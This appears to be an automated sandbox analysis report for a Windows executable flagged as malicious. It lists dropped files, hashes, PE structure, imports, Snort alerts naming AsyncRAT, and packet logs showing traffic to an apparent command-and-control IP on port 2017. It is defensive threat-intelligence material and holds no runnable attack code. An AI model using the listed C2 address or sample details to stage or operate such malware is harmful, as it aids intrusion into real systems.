File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\Public\Libraries\vokleakA.pif
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	66791
Entropy (8bit):	7.995531727155867
Encrypted:	true
SSDEEP:	1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
MD5:	AC05D27423A85ADC1622C714F2CB6184
SHA1:	B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
SHA-256:	C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
SHA-512:	6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
Malicious:	false
Preview:	MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.\| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..Q..._<.S....{a.=.n...PT.Um).\| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\Public\Libraries\vokleakA.pif
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.085588575196414
Encrypted:	false
SSDEEP:	6:kKxkwsurN+SkQlPlEGYRMY9z+4KlDA3RUeWc3l0:WfPkPlE99SNxAhUeWcC
MD5:	DE71021802249E02316A83FA7AD23086
SHA1:	414401CA81B7FC3F5928C7524B6946C159113E63
SHA-256:	3455DF62E393107D8C7CD14DECF1D284286BE7213CCF3A03C12B299B6C36C8B5
SHA-512:	41A3AD9A677A86FFA4D215648B236443DDCC4EC793BD3A4EF20312D012024E74DC20FAB8652FBEB1FE2DE1D2ACAFB6640C32003D134795E304B41248B88B2586
Malicious:	false
Preview:	p...... ........!s..N..(....................................................... ..........H"......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".3.f.e.4.e.6.1.a.4.8.2.2.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vokleakA.pif.log

Download File

Process:	C:\Users\Public\Libraries\vokleakA.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.502655957593833
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	PCMNil7wkU.exe
File size:	1'743'360 bytes
MD5:	344c9c0f72c535e334a4b605212c69d9
SHA1:	952e1b506659a4113b2eb0857dbb86ee08e043a5
SHA256:	5664820279aa20d408c82998bff07ab34c0986124b09e9ef2025c73686c77f4f
SHA512:	a0e787755a38b2f3de72f17530b8ab6893db498c50a957df17ce16945b661e5daea648b3936267660a35478ac127a125a78c5f53099451e6950488198d204ba5
SSDEEP:	24576:ABOzHk9lBOQdkm5UfwauFL3WlrpY7Gv1eeajEja3KgffHCx2GwVT6ltVIaH3+j:AwyBmm5VXL3WZ7vcVjEvGHaKV2FJ3+j
TLSH:	1C85DF5237E0CDE3D556007ACF0DC7B5E93A7C788A60E09732D8ACDC6B64253265A6E3
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	36728bbb83232b23

Static PE Info

General

Entrypoint:	0x4627d4
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9c466e75a4b8f1ca51d88eec13870235

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00461050h
call 00007FF4B9436FC9h
mov eax, dword ptr [0058B6F4h]
mov eax, dword ptr [eax]
call 00007FF4B948B959h
mov ecx, dword ptr [0058B7ECh]
mov eax, dword ptr [0058B6F4h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00460BB0h]
call 00007FF4B948B959h
mov eax, dword ptr [0058B6F4h]
mov eax, dword ptr [eax]
call 00007FF4B948B9CDh
call 00007FF4B9434E58h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x190000	0x2620	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19c000	0x16400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x195000	0x6f30	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x194000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x190740	0x5ec	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x60280	0x60400	85e21d4074c293c5dda21dc648954a60	False	0.5166725852272728	data	6.527037353978384	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x62000	0x81c	0xa00	24ea8c4a5fbc176b49f3f7bdd10211d4	False	0.51953125	data	5.4868067764310435	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x63000	0x12888c	0x128a00	c427229c8ea1558b3060d139c84b2273	False	0.7086806652970923	data	7.505375791125263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x18c000	0x3658	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x190000	0x2620	0x2800	645bd3caccdaf1e8a8046087eaaf5818	False	0.310546875	Encore not stripped - version 25	5.0381359206642236	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x193000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x194000	0x18	0x200	997bd445bd2a40316c4d07754f0fbc20	False	0.05078125	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Y"	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x195000	0x6f30	0x7000	ec80e6ffb76a64ef1ce99769581817ce	False	0.6201171875	data	6.672584848554824	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x19c000	0x16400	0x16400	ec88f869a8cf072294337de40d8353d0	False	0.16622410463483145	data	5.711041862104467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x19ca8c	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x19cbc0	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x19ccf4	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x19ce28	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x19cf5c	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x19d090	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x19d1c4	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x19d2f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x19d4c8	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x19d6ac	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x19d87c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x19da4c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x19dc1c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x19ddec	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x19dfbc	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x19e18c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x19e35c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_ICON	0x19e52c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m			0.4131147540983607
RT_ICON	0x19eeb4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m			0.29924953095684803
RT_ICON	0x19ff5c	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m			0.10951940850277264
RT_ICON	0x1a53e4	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m			0.07704435568635695
RT_STRING	0x1ae88c	0x3dc	data			0.4200404858299595
RT_STRING	0x1aec68	0xb4	data			0.6888888888888889
RT_STRING	0x1aed1c	0xe8	data			0.6422413793103449
RT_STRING	0x1aee04	0x2a8	data			0.4764705882352941
RT_STRING	0x1af0ac	0x3e8	data			0.382
RT_STRING	0x1af494	0x370	data			0.4022727272727273
RT_STRING	0x1af804	0x3cc	data			0.33539094650205764
RT_STRING	0x1afbd0	0x214	data			0.49624060150375937
RT_STRING	0x1afde4	0xcc	data			0.6274509803921569
RT_STRING	0x1afeb0	0x194	data			0.5643564356435643
RT_STRING	0x1b0044	0x3c4	data			0.3288381742738589
RT_STRING	0x1b0408	0x338	data			0.42961165048543687
RT_STRING	0x1b0740	0x294	data			0.42424242424242425
RT_RCDATA	0x1b09d4	0x10	data			1.5
RT_RCDATA	0x1b09e4	0x2c4	data			0.7259887005649718
RT_RCDATA	0x1b0ca8	0x745	Delphi compiled form 'TComSetupFrm'			0.3750671681891456
RT_RCDATA	0x1b13f0	0x840	Delphi compiled form 'TComTrmSetForm'			0.4090909090909091
RT_RCDATA	0x1b1c30	0x633	Delphi compiled form 'TForm1'			0.44045368620037806
RT_GROUP_CURSOR	0x1b2264	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x1b2278	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x1b228c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1b22a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1b22b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1b22c8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1b22dc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x1b22f0	0x3e	data			0.8709677419354839

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CoUninitialize, CoInitialize
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
uRL	FileProtocolHandlerA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
139.84.229.159192.168.2.52017497072030673 01/23/24-14:33:00.107795	TCP	2030673	ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)	2017	49707	139.84.229.159	192.168.2.5
139.84.229.159192.168.2.52017497072035595 01/23/24-14:33:00.107795	TCP	2035595	ET TROJAN Generic AsyncRAT Style SSL Cert	2017	49707	139.84.229.159	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 14:32:50.530705929 CET	49704	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.530797958 CET	443	49704	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:50.530895948 CET	49704	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.531054020 CET	49704	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.531352997 CET	443	49704	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:50.531421900 CET	49704	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.576374054 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.576412916 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:50.576478958 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.577924013 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.577941895 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:50.962935925 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:50.963011026 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.965384960 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:50.965394020 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:50.965814114 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:51.008174896 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:51.057610035 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:51.097904921 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:51.384867907 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:51.385092020 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:51.385154963 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:51.387270927 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:51.387290955 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:51.387334108 CET	49705	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:32:51.387341022 CET	443	49705	150.171.43.11	192.168.2.5
Jan 23, 2024 14:32:59.375097990 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:32:59.726002932 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:32:59.726586103 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:32:59.745872021 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:00.107795000 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:00.107825041 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:00.107928038 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:00.113692999 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:00.465652943 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:00.515456915 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:01.297205925 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:01.700170040 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:01.700356960 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:02.106523037 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:06.728553057 CET	49709	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:06.728601933 CET	443	49709	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:06.728672981 CET	49709	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:06.728863001 CET	49709	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:06.729254007 CET	443	49709	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:06.729324102 CET	49709	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:06.748394966 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:06.748449087 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:06.748531103 CET	49710	443	192.168.2.5	150.171.43.11
